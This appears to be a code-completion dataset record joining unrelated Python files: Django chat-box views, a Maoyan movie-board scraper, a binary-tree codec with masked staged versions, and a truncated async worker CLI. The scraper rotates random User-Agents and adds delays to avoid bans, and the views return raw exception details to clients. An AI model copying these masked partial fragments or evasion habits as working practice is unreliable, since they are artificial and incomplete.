stuCloseChatBoxView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n \n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)).first()\n else:\n 
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=Student.objects.filter(stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 打开聊天框\nclass stuOpenChatBoxView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n \n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 搜索联系人\nclass stuSearchContactView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n # print(receiver,identity=='0')\n\n # user = Teacher.objects.filter(id=username).first()\n # 0:教师,1:学生,2:还未搜索,3:自己,4:用户不存在\n iden = 4\n if 
identity == '1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {\n 'identity': iden,\n 'receiver': receiver\n }\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n",
"step-ids": [
14,
18,
21,
25,
26
]
}
|
[
14,
18,
21,
25,
26
] |
from urllib import request
import time
import random
from useragents import ua_list
import re
import os
class MaoyanSpider(object):
    """Scrape the Maoyan top-100 board: film info, comments and poster images."""

    def __init__(self):
        # {} is filled with the paging offset (0, 10, 20, ...)
        self.url = 'https://maoyan.com/board/4?offset={}'

    def get_html(self, url):
        """Fetch *url* with a random User-Agent and return the decoded HTML."""
        headers = {
            'User-Agent': random.choice(ua_list)
        }
        req = request.Request(url=url, headers=headers)
        # close the response explicitly so connections are not leaked
        with request.urlopen(req) as res:
            return res.read().decode()

    def re_func(self, re_bds, html):
        """Return all matches of regex *re_bds* (compiled with re.S) in *html*."""
        pattern = re.compile(re_bds, re.S)
        return pattern.findall(html)

    def parse_html(self, one_url):
        """Parse one board page and hand the extracted rows to save_html()."""
        one_html = self.get_html(one_url)
        # groups: (detail link, title, star line, release-time line)
        re_bds = '<div class="movie-item-info">.*?href="(.*?)".*?title="(.*?)".*?<p class="star">(.*?)</p>.*?class="releasetime">(.*?)</p>'
        # r_list: [('/films/1203','name','star','time'), ...]
        r_list = self.re_func(re_bds, one_html)
        self.save_html(r_list)

    def save_html(self, r_list):
        """Build one item dict per movie, print it and download its images."""
        for r in r_list:
            # r: ('/films/1203','name','star','time')
            # fresh dict each iteration (the original reused one shared dict)
            item = {}
            item['name'] = r[1].strip()
            item['star'] = r[2].strip()[3:]    # drop the 3-char label prefix
            item['time'] = r[3].strip()[5:15]  # keep only the date substring
            two_link = 'https://maoyan.com' + r[0]
            item['comment'] = self.get_comment(two_link)
            print(item)
            self.save_image(two_link, item['name'])

    def get_comment(self, two_link):
        """Return the list of comment snippets found on a film detail page."""
        two_html = self.get_html(two_link)
        # NOTE(review): debug dump of the last fetched page; remove if unneeded
        with open('test.html', 'w') as f:
            f.write(two_html)
        re_bds = '<div class="comment-content">(.*?)</div>'
        return self.re_func(re_bds, two_html)

    def save_image(self, two_link, name):
        """Download every poster image on a film detail page into a per-film dir."""
        two_html = self.get_html(two_link)
        re_bds = '<div class="img.*?"><img class="default-img" data-src="(.*?)" alt=""></div>'
        # link_list: ['src1','src2','src3']
        link_list = self.re_func(re_bds, two_html)
        print(link_list)
        # create the destination folder on first use
        directory = '/home/tarena/images/' + name + '/'
        if not os.path.exists(directory):
            os.makedirs(directory)
        for link in link_list:
            headers = {'User-Agent': random.choice(ua_list)}
            req = request.Request(url=link, headers=headers)
            # close each image response instead of leaking it
            with request.urlopen(req) as res:
                html = res.read()
            filename = directory + link.split('@')[0][-10:]
            with open(filename, 'wb') as f:
                f.write(html)
            time.sleep(random.randint(1, 3))  # throttle to avoid bans

    def run(self):
        """Crawl board pages at offsets 0, 10, 20 with a polite delay."""
        for offset in range(0, 21, 10):
            url = self.url.format(offset)
            self.parse_html(url)
            time.sleep(random.randint(1, 2))
# Script entry point: build the spider and crawl all board pages.
if __name__ == '__main__':
    spider = MaoyanSpider()
    spider.run()
|
normal
|
{
"blob_id": "7ef0bb3e8cbba4a29249a09cf7bc91e053411361",
"index": 2225,
"step-1": "<mask token>\n\n\nclass MaoyanSpider(object):\n\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n def get_html(self, url):\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n return html\n <mask token>\n <mask token>\n <mask token>\n\n def get_comment(self, two_link):\n two_html = self.get_html(two_link)\n with open('test.html', 'w') as f:\n f.write(two_html)\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds, two_html)\n return comment_list\n\n def save_image(self, two_link, name):\n two_html = self.get_html(two_link)\n re_bds = (\n '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n )\n link_list = self.re_func(re_bds, two_html)\n print(link_list)\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n for link in link_list:\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=link, headers=headers)\n res = request.urlopen(req)\n html = res.read()\n filename = directory + link.split('@')[0][-10:]\n with open(filename, 'wb') as f:\n f.write(html)\n time.sleep(random.randint(1, 3))\n\n def run(self):\n for offset in range(0, 21, 10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1, 2))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MaoyanSpider(object):\n\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n def get_html(self, url):\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n return html\n\n def re_func(self, re_bds, html):\n pattern = re.compile(re_bds, re.S)\n r_list = pattern.findall(html)\n return r_list\n\n def parse_html(self, one_url):\n one_html = self.get_html(one_url)\n re_bds = (\n '<div class=\"movie-item-info\">.*?href=\"(.*?)\".*?title=\"(.*?)\".*?<p class=\"star\">(.*?)</p>.*?class=\"releasetime\">(.*?)</p>'\n )\n r_list = self.re_func(re_bds, one_html)\n self.save_html(r_list)\n\n def save_html(self, r_list):\n item = {}\n for r in r_list:\n item['name'] = r[1].strip()\n item['star'] = r[2].strip()[3:]\n item['time'] = r[3].strip()[5:15]\n two_link = 'https://maoyan.com' + r[0]\n item['comment'] = self.get_comment(two_link)\n print(item)\n self.save_image(two_link, item['name'])\n\n def get_comment(self, two_link):\n two_html = self.get_html(two_link)\n with open('test.html', 'w') as f:\n f.write(two_html)\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds, two_html)\n return comment_list\n\n def save_image(self, two_link, name):\n two_html = self.get_html(two_link)\n re_bds = (\n '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n )\n link_list = self.re_func(re_bds, two_html)\n print(link_list)\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n for link in link_list:\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=link, headers=headers)\n res = request.urlopen(req)\n html = res.read()\n filename = directory + link.split('@')[0][-10:]\n with open(filename, 'wb') as f:\n f.write(html)\n time.sleep(random.randint(1, 3))\n\n def 
run(self):\n for offset in range(0, 21, 10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1, 2))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MaoyanSpider(object):\n\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n def get_html(self, url):\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n return html\n\n def re_func(self, re_bds, html):\n pattern = re.compile(re_bds, re.S)\n r_list = pattern.findall(html)\n return r_list\n\n def parse_html(self, one_url):\n one_html = self.get_html(one_url)\n re_bds = (\n '<div class=\"movie-item-info\">.*?href=\"(.*?)\".*?title=\"(.*?)\".*?<p class=\"star\">(.*?)</p>.*?class=\"releasetime\">(.*?)</p>'\n )\n r_list = self.re_func(re_bds, one_html)\n self.save_html(r_list)\n\n def save_html(self, r_list):\n item = {}\n for r in r_list:\n item['name'] = r[1].strip()\n item['star'] = r[2].strip()[3:]\n item['time'] = r[3].strip()[5:15]\n two_link = 'https://maoyan.com' + r[0]\n item['comment'] = self.get_comment(two_link)\n print(item)\n self.save_image(two_link, item['name'])\n\n def get_comment(self, two_link):\n two_html = self.get_html(two_link)\n with open('test.html', 'w') as f:\n f.write(two_html)\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds, two_html)\n return comment_list\n\n def save_image(self, two_link, name):\n two_html = self.get_html(two_link)\n re_bds = (\n '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n )\n link_list = self.re_func(re_bds, two_html)\n print(link_list)\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n for link in link_list:\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=link, headers=headers)\n res = request.urlopen(req)\n html = res.read()\n filename = directory + link.split('@')[0][-10:]\n with open(filename, 'wb') as f:\n f.write(html)\n time.sleep(random.randint(1, 3))\n\n def 
run(self):\n for offset in range(0, 21, 10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1, 2))\n\n\nif __name__ == '__main__':\n spider = MaoyanSpider()\n spider.run()\n",
"step-4": "from urllib import request\nimport time\nimport random\nfrom useragents import ua_list\nimport re\nimport os\n\n\nclass MaoyanSpider(object):\n\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n def get_html(self, url):\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n return html\n\n def re_func(self, re_bds, html):\n pattern = re.compile(re_bds, re.S)\n r_list = pattern.findall(html)\n return r_list\n\n def parse_html(self, one_url):\n one_html = self.get_html(one_url)\n re_bds = (\n '<div class=\"movie-item-info\">.*?href=\"(.*?)\".*?title=\"(.*?)\".*?<p class=\"star\">(.*?)</p>.*?class=\"releasetime\">(.*?)</p>'\n )\n r_list = self.re_func(re_bds, one_html)\n self.save_html(r_list)\n\n def save_html(self, r_list):\n item = {}\n for r in r_list:\n item['name'] = r[1].strip()\n item['star'] = r[2].strip()[3:]\n item['time'] = r[3].strip()[5:15]\n two_link = 'https://maoyan.com' + r[0]\n item['comment'] = self.get_comment(two_link)\n print(item)\n self.save_image(two_link, item['name'])\n\n def get_comment(self, two_link):\n two_html = self.get_html(two_link)\n with open('test.html', 'w') as f:\n f.write(two_html)\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds, two_html)\n return comment_list\n\n def save_image(self, two_link, name):\n two_html = self.get_html(two_link)\n re_bds = (\n '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n )\n link_list = self.re_func(re_bds, two_html)\n print(link_list)\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n for link in link_list:\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=link, headers=headers)\n res = request.urlopen(req)\n html = res.read()\n filename = directory + link.split('@')[0][-10:]\n with 
open(filename, 'wb') as f:\n f.write(html)\n time.sleep(random.randint(1, 3))\n\n def run(self):\n for offset in range(0, 21, 10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1, 2))\n\n\nif __name__ == '__main__':\n spider = MaoyanSpider()\n spider.run()\n",
"step-5": "from urllib import request\nimport time\nimport random\nfrom useragents import ua_list\nimport re\nimport os\n\nclass MaoyanSpider(object):\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n # 请求功能函数 - html\n def get_html(self,url):\n headers = {\n 'User-Agent':random.choice(ua_list)\n }\n req = request.Request(url=url,headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n\n return html\n\n # 解析功能函数\n def re_func(self,re_bds,html):\n pattern = re.compile(re_bds,re.S)\n r_list = pattern.findall(html)\n\n return r_list\n\n # 解析一级页面\n def parse_html(self,one_url):\n one_html = self.get_html(one_url)\n re_bds = '<div class=\"movie-item-info\">.*?href=\"(.*?)\".*?title=\"(.*?)\".*?<p class=\"star\">(.*?)</p>.*?class=\"releasetime\">(.*?)</p>'\n # r_list: [('/films/1203','name','star','time'),()]\n r_list = self.re_func(re_bds,one_html)\n self.save_html(r_list)\n\n def save_html(self,r_list):\n item = {}\n # r: ('/films/1203','name','star','time')\n for r in r_list:\n item['name'] = r[1].strip()\n item['star'] = r[2].strip()[3:]\n item['time'] = r[3].strip()[5:15]\n two_link = 'https://maoyan.com' + r[0]\n item['comment'] = self.get_comment(two_link)\n print(item)\n self.save_image(two_link,item['name'])\n\n # 获取评论的函数\n def get_comment(self,two_link):\n two_html = self.get_html(two_link)\n\n with open('test.html','w') as f:\n f.write(two_html)\n\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds,two_html)\n\n return comment_list\n\n\n # 保存图片函数\n def save_image(self,two_link,name):\n two_html = self.get_html(two_link)\n\n re_bds = '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n # link_list: ['src1','src2','src3']\n link_list = self.re_func(re_bds,two_html)\n\n print(link_list)\n\n # 创建对应文件夹\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n for link in link_list:\n 
headers = {'User-Agent':random.choice(ua_list)}\n req = request.Request(url=link,headers=headers)\n res = request.urlopen(req)\n html = res.read()\n\n filename = directory + \\\n link.split('@')[0][-10:]\n with open(filename,'wb') as f:\n f.write(html)\n time.sleep(random.randint(1,3))\n\n def run(self):\n for offset in range(0,21,10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1,2))\n\nif __name__ == '__main__':\n spider = MaoyanSpider()\n spider.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
6,
9,
10,
11,
12
]
}
|
[
6,
9,
10,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Codec:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Codec:
<|reserved_special_token_0|>
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
self.data = data
if data[0] == 'X':
return None
else:
t = TreeNode(int(self.data[:self.data.find(',')]))
t.left = self.deserialize(self.data[self.data.find(',') + 1:])
t.right = self.deserialize(self.data[self.data.find(',') + 1:])
return t
<|reserved_special_token_1|>
class Codec:
    """Serialize/deserialize a binary tree via a pre-order CSV encoding."""

    def serialize(self, root):
        """Encode *root* as comma-separated pre-order values; 'X' marks null.

        :type root: TreeNode
        :rtype: str
        """
        if not root:
            return 'X'
        parts = [str(root.val),
                 self.serialize(root.left),
                 self.serialize(root.right)]
        return ','.join(parts)

    def deserialize(self, data):
        """Rebuild the tree from a serialize() string.

        Each recursive call rebinds self.data, so once the left subtree has
        been consumed, self.data holds the remaining suffix and the right
        subtree is parsed from the correct offset.

        :type data: str
        :rtype: TreeNode
        """
        self.data = data
        if data[0] == 'X':
            return None
        node = TreeNode(int(self.data[:self.data.find(',')]))
        node.left = self.deserialize(self.data[self.data.find(',') + 1:])
        node.right = self.deserialize(self.data[self.data.find(',') + 1:])
        return node
<|reserved_special_token_1|>
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
    """Serialize/deserialize a binary tree using a pre-order CSV encoding.

    Large blocks of commented-out BFS code from an earlier attempt were
    removed; only the recursive pre-order implementation remains.
    """

    def serialize(self, root):
        """Encode a tree as comma-separated pre-order values.

        Null children are written as 'X' so the shape is unambiguous,
        e.g. a single node 1 serializes to "1,X,X".

        :type root: TreeNode
        :rtype: str
        """
        if not root:
            return "X"
        return ",".join([str(root.val),
                         self.serialize(root.left),
                         self.serialize(root.right)])

    def deserialize(self, data):
        """Decode a string produced by serialize() back into a tree.

        Each call rebinds self.data; when the left-subtree recursion
        returns, self.data holds the still-unconsumed suffix, so the
        right subtree is parsed from the correct position.

        :type data: str
        :rtype: TreeNode
        """
        self.data = data
        if data[0] == "X":
            return None
        t = TreeNode(int(self.data[:self.data.find(",")]))
        t.left = self.deserialize(self.data[self.data.find(",") + 1:])
        t.right = self.deserialize(self.data[self.data.find(",") + 1:])
        return t
# Your Codec object will be instantiated and called as such:
# ser = Codec()
# deser = Codec()
# ans = deser.deserialize(ser.serialize(root))
|
flexible
|
{
"blob_id": "006e1088e72201fab7eebd1409c025b5dba69403",
"index": 5938,
"step-1": "<mask token>\n",
"step-2": "class Codec:\n <mask token>\n <mask token>\n",
"step-3": "class Codec:\n <mask token>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n self.data = data\n if data[0] == 'X':\n return None\n else:\n t = TreeNode(int(self.data[:self.data.find(',')]))\n t.left = self.deserialize(self.data[self.data.find(',') + 1:])\n t.right = self.deserialize(self.data[self.data.find(',') + 1:])\n return t\n",
"step-4": "class Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n \n :type root: TreeNode\n :rtype: str\n \"\"\"\n if not root:\n return 'X'\n else:\n return ','.join([str(root.val), self.serialize(root.left), self\n .serialize(root.right)])\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n self.data = data\n if data[0] == 'X':\n return None\n else:\n t = TreeNode(int(self.data[:self.data.find(',')]))\n t.left = self.deserialize(self.data[self.data.find(',') + 1:])\n t.right = self.deserialize(self.data[self.data.find(',') + 1:])\n return t\n",
"step-5": "# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n \n :type root: TreeNode\n :rtype: str\n \"\"\"\n if(not root) :\n return \"X\"\n else :\n return \",\".join([str(root.val), self.serialize(root.left), self.serialize(root.right)])\n \n \n# Q = [root]\n# res = []\n# while(Q) :\n# newQ = []\n# noChange = True\n# while(Q) :\n# v = Q.pop(0)\n# if(v == None) :\n# res.append(' ')\n# newQ.append(None)\n# newQ.append(None)\n# else :\n# res.append(str(v.val))\n \n# if(v.left == None) :\n# newQ.append(None)\n# else :\n# noChange = False\n# newQ.append(v.left) \n \n# if(v.right == None) :\n# newQ.append(None)\n# else :\n# noChange = False\n# newQ.append(v.right)\n\n \n# if(noChange) :\n# break\n# Q = newQ\n# return ','.join(res)\n \n \n \n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n self.data = data\n \n if(data[0] == \"X\") :\n return None\n else :\n t = TreeNode(int(self.data[: self.data.find(\",\")]))\n t.left = self.deserialize(self.data[self.data.find(\",\") + 1 :])\n t.right = self.deserialize(self.data[self.data.find(\",\") + 1 :])\n return t\n \n \n \n# arr = data.split(\",\")\n \n# l = len(arr)\n \n# if(l == 0 or arr[0] == \" \") :\n# return None\n \n# t = TreeNode(int(arr[0]))\n \n# Q = [t]\n \n# half = (l + 1) / 2 - 1\n \n# i = 0\n \n \n# while(i < half) :\n# v = Q.pop(0)\n# if(v == None) :\n# i += 1\n# Q.append(None)\n# Q.append(None)\n# continue\n \n# if(arr[2 * i + 1] == ' ') :\n# v.left = None\n# Q.append(None)\n# else :\n# l = TreeNode(int(arr[2 * i + 1]))\n# v.left = l\n# Q.append(l)\n# if(arr[2 * i + 2] == ' ') :\n# v.right = None\n# Q.append(None)\n# else :\n# r = TreeNode(int(arr[2 * i + 2]))\n# v.right = r\n# Q.append(r)\n# i += 1\n# return t\n \n \n\n# Your Codec object will be 
instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# ans = deser.deserialize(ser.serialize(root))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:
@wraps(fn)
@click.pass_context
def wrapper(ctx, *args, **kwargs):
loop = ctx.obj['loop']
return loop.run_until_complete(fn(ctx, *args, **kwargs))
return wrapper
@click.group()
@click.option('-M', '--manager', 'manager', required=True, help=
'Python path to the manager')
@click.pass_context
def cli(ctx: click.Context, manager: str):
ctx.obj['manager'] = import_manager(manager)
<|reserved_special_token_0|>
def main():
loop = asyncio.get_event_loop()
cli(obj={'loop': loop})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def import_manager(path: str) ->Donald:
"""Import a manager from a python path."""
manager: Donald = import_obj(path)
return manager
def process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:
@wraps(fn)
@click.pass_context
def wrapper(ctx, *args, **kwargs):
loop = ctx.obj['loop']
return loop.run_until_complete(fn(ctx, *args, **kwargs))
return wrapper
@click.group()
@click.option('-M', '--manager', 'manager', required=True, help=
'Python path to the manager')
@click.pass_context
def cli(ctx: click.Context, manager: str):
ctx.obj['manager'] = import_manager(manager)
<|reserved_special_token_0|>
def main():
loop = asyncio.get_event_loop()
cli(obj={'loop': loop})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if TYPE_CHECKING:
from donald.manager import Donald
from .types import TV
def import_manager(path: str) -> Donald:
    """Resolve *path* (a dotted python path) to the Donald manager it names."""
    return import_obj(path)
def process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:
    """Decorator: run the wrapped async click callback to completion.

    The shared event loop is taken from ctx.obj['loop'] (put there by
    main() via cli(obj=...)); the sync wrapper blocks until the coroutine
    finishes and returns its result.
    """
    @wraps(fn)
    @click.pass_context
    def wrapper(ctx, *args, **kwargs):
        loop = ctx.obj['loop']
        return loop.run_until_complete(fn(ctx, *args, **kwargs))
    return wrapper
@click.group()
@click.option('-M', '--manager', 'manager', required=True, help=
    'Python path to the manager')
@click.pass_context
def cli(ctx: click.Context, manager: str):
    """Root command group: import the manager and stash it on the click context."""
    ctx.obj['manager'] = import_manager(manager)
@cli.command(help='Launch a worker')
@click.option('-S', '--scheduler', 'scheduler', is_flag=True, help=
    'Start a scheduler')
@process_await
async def worker(ctx: click.Context, *, scheduler: bool=False, **params):
    """Launch a worker (optionally with the scheduler) until SIGINT/SIGTERM.

    Extra **params are forwarded to manager.create_worker().
    """
    loop = ctx.obj['loop']
    async def stop():
        # Deregister first so a second signal cannot schedule stop() again.
        loop.remove_signal_handler(signal.SIGTERM)
        loop.remove_signal_handler(signal.SIGINT)
        # NOTE(review): closes over the local `worker`/`manager` bound below;
        # a signal arriving before they are assigned would raise NameError.
        await worker.stop()
        if scheduler:
            await manager.scheduler.stop()
        await manager.stop()
    loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))
    loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))
    manager: Donald = ctx.obj['manager']
    await manager.start()
    if scheduler:
        manager.scheduler.start()
    # local `worker` is the worker object, not the module-level command
    worker = manager.create_worker(show_banner=True, **params)
    worker.start()
    await worker.wait()
@cli.command(help='Launch a scheduler')
@process_await
async def scheduler(ctx: click.Context):
    """Run only the manager's scheduler until SIGINT/SIGTERM is received."""
    loop = ctx.obj['loop']
    async def stop():
        # Deregister first so repeated signals do not schedule stop() twice.
        loop.remove_signal_handler(signal.SIGTERM)
        loop.remove_signal_handler(signal.SIGINT)
        await manager.scheduler.stop()
        await manager.stop()
    loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))
    loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))
    manager: Donald = ctx.obj['manager']
    await manager.start()
    manager.scheduler.start()
    await manager.scheduler.wait()
def main():
    """CLI entry point: create the event loop and hand it to click."""
    cli(obj={'loop': asyncio.get_event_loop()})
# Run the CLI when executed as a script.
if __name__ == '__main__':
    main()
<|reserved_special_token_1|>
from __future__ import annotations
import asyncio
import signal
from functools import wraps
from typing import TYPE_CHECKING, Awaitable, Callable
import click
from .utils import import_obj
if TYPE_CHECKING:
from donald.manager import Donald
from .types import TV
def import_manager(path: str) -> Donald:
    """Resolve *path* (a dotted python path) to the Donald manager it names."""
    return import_obj(path)
def process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:
    """Decorator: run the wrapped async click callback to completion.

    The shared event loop is taken from ctx.obj['loop'] (put there by
    main() via cli(obj=...)); the sync wrapper blocks until the coroutine
    finishes and returns its result.
    """
    @wraps(fn)
    @click.pass_context
    def wrapper(ctx, *args, **kwargs):
        loop = ctx.obj['loop']
        return loop.run_until_complete(fn(ctx, *args, **kwargs))
    return wrapper
@click.group()
@click.option('-M', '--manager', 'manager', required=True, help=
    'Python path to the manager')
@click.pass_context
def cli(ctx: click.Context, manager: str):
    """Root command group: import the manager and stash it on the click context."""
    ctx.obj['manager'] = import_manager(manager)
@cli.command(help='Launch a worker')
@click.option('-S', '--scheduler', 'scheduler', is_flag=True, help=
    'Start a scheduler')
@process_await
async def worker(ctx: click.Context, *, scheduler: bool=False, **params):
    """Launch a worker (optionally with the scheduler) until SIGINT/SIGTERM.

    Extra **params are forwarded to manager.create_worker().
    """
    loop = ctx.obj['loop']
    async def stop():
        # Deregister first so a second signal cannot schedule stop() again.
        loop.remove_signal_handler(signal.SIGTERM)
        loop.remove_signal_handler(signal.SIGINT)
        # NOTE(review): closes over the local `worker`/`manager` bound below;
        # a signal arriving before they are assigned would raise NameError.
        await worker.stop()
        if scheduler:
            await manager.scheduler.stop()
        await manager.stop()
    loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))
    loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))
    manager: Donald = ctx.obj['manager']
    await manager.start()
    if scheduler:
        manager.scheduler.start()
    # local `worker` is the worker object, not the module-level command
    worker = manager.create_worker(show_banner=True, **params)
    worker.start()
    await worker.wait()
@cli.command(help='Launch a scheduler')
@process_await
async def scheduler(ctx: click.Context):
    """Run only the manager's scheduler until SIGINT/SIGTERM is received."""
    loop = ctx.obj['loop']
    async def stop():
        # Deregister first so repeated signals do not schedule stop() twice.
        loop.remove_signal_handler(signal.SIGTERM)
        loop.remove_signal_handler(signal.SIGINT)
        await manager.scheduler.stop()
        await manager.stop()
    loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))
    loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))
    manager: Donald = ctx.obj['manager']
    await manager.start()
    manager.scheduler.start()
    await manager.scheduler.wait()
def main():
    """CLI entry point: create the event loop and hand it to click."""
    cli(obj={'loop': asyncio.get_event_loop()})
# Run the CLI when executed as a script.
if __name__ == '__main__':
    main()
<|reserved_special_token_1|>
from __future__ import annotations
import asyncio
import signal
from functools import wraps
from typing import TYPE_CHECKING, Awaitable, Callable
import click
from .utils import import_obj
if TYPE_CHECKING:
from donald.manager import Donald
from .types import TV
def import_manager(path: str) -> Donald:
    """Resolve *path* (a dotted python path) to the manager object it names."""
    return import_obj(path)
def process_await(fn: Callable[..., Awaitable[TV]]) -> Callable[..., TV]:
    """Wrap an async click command so it executes on ``ctx.obj['loop']``."""

    @wraps(fn)
    @click.pass_context
    def _runner(ctx, *args, **kwargs):
